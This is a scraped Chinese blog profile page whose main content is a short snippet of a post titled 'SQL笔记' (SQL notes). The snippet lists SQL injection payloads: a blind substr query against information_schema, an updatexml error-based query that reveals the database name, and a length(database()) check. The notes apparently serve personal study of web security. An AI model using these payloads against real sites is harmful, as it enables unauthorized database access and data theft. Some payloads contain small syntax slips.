- 博客(3)
- 收藏
- 关注
原创 SQL笔记
同样的操作多次重复便可得到数据库名称和用户信息,例如 ' and substr((select table_name from information_schema.table where table_schema=' 数据库名字 ' limit 0,1),1,1)=''--+’ and updatexml (1,concat(0x7e,(select database())),0x7e),1)--+(获得数据库名称)先判断数据库库名长度 'and length(database())>=1--+
2023-09-19 23:01:37 240 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人